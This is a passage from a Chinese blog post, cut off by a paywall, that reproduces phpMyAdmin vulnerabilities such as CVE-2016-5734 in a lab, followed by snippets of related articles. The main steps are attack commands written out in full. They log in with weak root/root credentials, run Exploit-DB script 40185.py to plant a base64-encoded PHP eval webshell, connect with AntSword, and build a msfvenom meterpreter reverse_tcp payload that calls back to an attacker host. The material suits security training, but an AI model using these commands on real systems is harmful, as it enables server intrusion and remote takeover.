【phpmyadmin漏洞复现】CVE-2016-5734远程代码执行漏洞+CVE-2018-12613文件包含漏洞+WooYun-2016-199433反序列化漏洞

最新推荐文章于 2025-09-22 11:11:05 发布

原创

最新推荐文章于 2025-09-22 11:11:05 发布 · 1k 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#网络安全

CVE-2016-5734

1.访问8080端口，用弱口令root root登录

2. 在Kali中有自带的EXP：

searchsploit phpmyadmin

3.进入该目录：/usr/share/exploitdb/exploits/php/webapps，通过EXP写入一句话木马：

python3 40185.py -u root --pwd="root" http://192.168.225.139:8080/ -c "file_put_contents('shell.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4='));"

4.用蚁剑连接：

5.然后通过msfvenom生成木马：

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.225.133 LPORT=2333 -f elf>/root/sa.elf

6.通过蚁剑把sa.elf上传到容器的/tmp环境下，/tmp环境是临时文件目录普通用户的权限都比较大

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

malloc_冲！

关注关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

PhpMyAdmin漏洞介绍

weixin_45253622的博客

03-19

3668

获取网站绝对路径，

PhpMyAdmin远程执行代码漏洞复现（CVE-2016-5734）

千寻的博客

03-21

1850

phpMyAdmin`中存在安全漏洞，该漏洞源于程序没有正确选择分隔符来避免使用`preg_replace e`修饰符。远程攻击者可借助特制的字符串利用该漏洞执行任意PHP代码。

参与评论您还未登录，请先登录后发表或查看评论

buuctf [PHPMYADMIN]CVE-2016-5734

qq_1873822的博客

03-19

806

漏洞简介 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能中，将用户输入的信息拼接进preg_replace函数第一个参数中。在PHP5.4.7以前，preg_replace的第一个参数可以利用\0进行截断，并将正则模式修改为e。众所周知，e模式的正则支持执行代码，此时将可构造一个任意代码执行漏洞。以下版本受到影响： 4.0.10.16之前4.0.x版本 4.4.15.7之前4.4.x版本 4.6.3之前4.6.x版本（实际上由于该版本要求PHP5.5+，

PhPMyadmin-漏洞复现

weixin_57682301的博客

08-03

837

前情提要：首先将我们的PHP版本设置在5.5以上。

玩转Exploit-DB，从脚本小子到安全专家

分享Python知识

09-22

1086

Exploit Database（Exploit-DB）是一个收集和维护了大量公开漏洞利用（Exploit）和概念验证（PoC）代码的数据库和网站。它由Offensive Security（OffSec）团队维护——是的，就是那个创办了顶级渗透测试认证OSCP的知名安全公司。Exploit-DB是一个标准化的漏洞利用代码归档系统，每个漏洞利用都有唯一的EDB-ID标识符，包含完整的元数据信息，如平台类型、漏洞分类、作者信息和发布日期。

vulhub-phpmyadmin中CVE-2016-5734

qq_26947429的博客

07-23

794

CVE-2016-5734远程代码执行漏洞影响版的本phpmyadmin4.3.0-4.6.2 看到phpmyadmin登陆页面爆破拿到用户名密码root，root 利用poc进行命令执行写入一句话进行菜刀连接 python27 CVE-2016-5734.py -u root -p "root" http://xx.xx.xx.xx:8080 -c "file_put_contents('shell.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbY21kX

phpmyadmin CVE-2016-5734

weixin_51692662的博客

11-03

325

phpmyadmin CVE-2016-5734

phpMyAdmin 4.8.1 本地文件包含漏洞复现

weixin_51681694的博客

04-22

1197

漏洞点在根目录下的index.php中的61行target传参可任意控制，控制index.php包含任意文件上面的if条件需要满足target且为且且中黑名单：查看最后一个条件，需要返回true第一个红框定义白名单第二个红框检查文件名是否在白名单中，在则返回true第三个红框将原传入字符串从0到?前分割出来，再检查字符串是否在白名单中，在则返回true可以考虑设置字符串内容？之前的字符串为白名单，绕过过滤，可是?不能出现在文件名中最后则是利用点。

wooyun-2015-148227漏洞

最新发布

11-14

我注意到用户引用的几个漏洞中有类似模式，如WooYun-2015-110216（Elasticsearch漏洞）和WooYun-2016-199433（phpmyadmin漏洞），但148227完全不在引用中。考虑到WooYun漏洞编号的连续性，148227应该属于2015年公开...

vulhub漏洞复现52_phpMyAdmin

weixin_44193247的博客

02-11

841

vulhub漏洞复现练习篇

被攻击的一些重点系统漏洞整理

鱼的博客

08-18

1614

一、OA系统泛微(Weaver-Ecology-OA) ???? 泛微OA E-cology RCE(CNVD-2019-32204) - 影响版本7.0/8.0/8.1/9.0 https://xz.aliyun.com/t/6560 ???? 泛微OA WorkflowCenterTreeData接口注入(限oracle数据库) https://zhuanlan.zhihu.com/p/86082614 ???? 泛微ecology OA数据库配置信息泄露 https://www.cnblogs.co

[CVE-2016-5734]phpmyadmin(4.3.0-4.6.2)命令执行漏洞复现

https://www.cnblogs.com/zpchcbd/

08-30

730

触发原因：preg_replace函数引发的触发原理：preg_replace漏洞触发有两个前提： 01：第一个参数需要e标识符，有了它可以执行第二个参数的命令 02：第一个参数需要在第三个参数中的中有匹配，不然echo会返回第三个参数而不执行命令，举个例子：影响漏洞版本：漏洞复现： 1、docker搭建 docker-compose up -d 2、漏洞利用代码：python php...

phpmyadmin漏洞分析复现

weixin_43047908的博客

08-19

1592

目录前言环境搭建漏洞复现CVE-2016-5734CVE-2018-12613 前言 phpMyAdmin 是一个以PHP为基础，以Web-Base方式架构在网站主机上的MySQL的数据库管理工具，让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径，尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行，但是您可以在任何地方使用这些程式产生的HTML页面，也就是于远端管理MySQL

phpMyAdmin 漏洞复现教程

2201_75891821的博客

08-03

734

然后我们更改日志保存路径然后查看是否更改成功显示更改成功然后我们插入一句话木马访问一下木马然后使用工具连接。

CVE-2016-5734 phpmyadmin 远程代码执行漏洞

xuxuxuxxxxx的博客

05-31

489

phpMyAdmin 是一个用PHP编写的软件工具，可以通过web方式控制和操作MySQL数据库。通过phpMyAdmin 可以完全对数据库进行操作，例如建立、复制和删除数据等等。phpMyAdmin在其查找并替换字符串功能中，将用户输入的信息拼接进 preg_replace 函数第一个参数中。在PHP5.4.7以前，preg_replace 的第一个参数可以利用\0进行截断，并将正则模式修改为e。众所周知，e模式的正则支持执行代码，此时将可构造一个任意代码执行漏洞。

CVE-2016-5734 phpmyadmin 远程命令执行漏洞

qq_41567985的博客

09-27

720

CVE-2016-5734在exploit-db上也就是phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行，根据描述可知受影响的phpMyAdmin所有的4.6.x版本(直至4.6.3)，4.4.x版本(直至4.4.15.7)，和4.0.x版本(直至4.0.10.16)。CVE的作者利用在php5.4.7之前的版本中preg_replace函数对空字节的错误处理Bug，使注入的代码可远程执行。

phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞（CVE-2016-5734）

黑白的博客

12-29

687

声明好好学习，天天向上漏洞描述 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能中，将用户输入的信息拼接进preg_replace函数第一个参数中。在PHP5.4.7以前，preg_replace的第一个参数可以利用\0进行截断，并将正则模式修改为e。众所周知，e模式的正则支持执行代码，此时将可构造一个任意代码执行漏洞。影响范围 4.0.10.16之前4.0.x版本 4.4.15.7之前4.4.x版本 4.6.3之前4.6.x版本（实际上由于该版本要

CVE-2016-5734 Phpmyadmin后台代码执行漏洞复现

alert['Hello World']

01-24

2837

目录漏洞描述影响版本漏洞环境搭建漏洞分析漏洞利用漏洞加固参考链接漏洞描述 CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ，意即phpMyAdmin认证用户的远程代码执行，根据描述可知受影响的phpMyAdmin所有的 4.6.x 版本（直至 4.6.3），4.4.x 版本（直至 4.4.15.7），和 4.0.x 版本（直至 4.0.10.16）。 CVE的作者利用在php 5

phpmyadmin弱口令至getshell 漏洞复现

Boom！脑洞大爆炸的博客

06-28

2158

phpmyadmin弱口令至getshell 漏洞复现

phpmyadmin通杀漏洞复现

07-25

### 漏洞复现步骤 phpMyAdmin 是一个基于 Web 的 MySQL 数据库管理工具，广泛用于 Web 开发中。由于其广泛使用，针对其漏洞的攻击也较为常见。在特定版本中，存在一个通杀漏洞，允许攻击者通过构造恶意请求执行任意代码。 #### 漏洞复现步骤 1. **环境搭建**：首先需要搭建一个包含 phpMyAdmin 的测试环境。可以使用 Docker 或者本地安装 Apache、MySQL 和 phpMyAdmin。确保 phpMyAdmin 的版本为受影响版本（如 4.8.0 或 4.8.1）[^1]。 2. **构造恶意请求**：利用该漏洞的关键在于构造一个特定的 HTTP 请求，该请求能够触发 phpMyAdmin 中的代码注入漏洞。通常，攻击者会利用 `index.php` 文件中的参数注入点，通过 `db` 或 `table` 参数传递恶意代码。 ```http POST /phpmyadmin/index.php?db=malicious_db&table=malicious_table HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Content-Length: length token=valid_token&lang=en&server=1 ``` 3. **注入代码**：在请求中，攻击者可以注入 PHP 代码，这些代码将在服务器端执行。例如，可以注入一个简单的 `phpinfo()` 函数来验证漏洞是否存在。 ```php <?php phpinfo(); ?> ``` 4. **验证漏洞**：发送请求后，检查服务器响应是否包含 `phpinfo()` 的输出。如果存在，则表明漏洞成功触发。 5. **进一步利用**：一旦确认漏洞存在，攻击者可以上传更复杂的后门脚本，如 Web Shell，以获得对服务器的持久访问权限。 ### 安全研究 #### 影响范围该漏洞影响了多个版本的 phpMyAdmin，特别是 4.8.0 和 4.8.1 版本。攻击者可以通过此漏洞在目标服务器上执行任意代码，进而获取敏感数据或控制服务器。 #### 修复建议 1. **升级版本**：官方在 4.8.2 版本中修复了该漏洞。建议用户尽快升级到最新版本。 2. **输入验证**：加强对用户输入的验证，防止恶意代码的注入。 3. **最小权限原则**：确保 phpMyAdmin 使用的数据库账户仅具有必要的最小权限，以减少潜在攻击的影响范围。 4. **定期更新**：保持 phpMyAdmin 及其依赖组件的定期更新，及时修补已知漏洞。 5. **安全审计**：定期对 Web 应用进行安全审计，发现并修复潜在的安全隐患。 #### 防御措施 - **防火墙配置**：配置 Web 应用防火墙（WAF），过滤异常请求，阻止恶意流量。 - **日志监控**：启用详细的日志记录，监控可疑活动，及时发现并响应攻击行为。 - **安全意识培训**：提高开发人员和运维人员的安全意识，避免常见的安全错误。 ###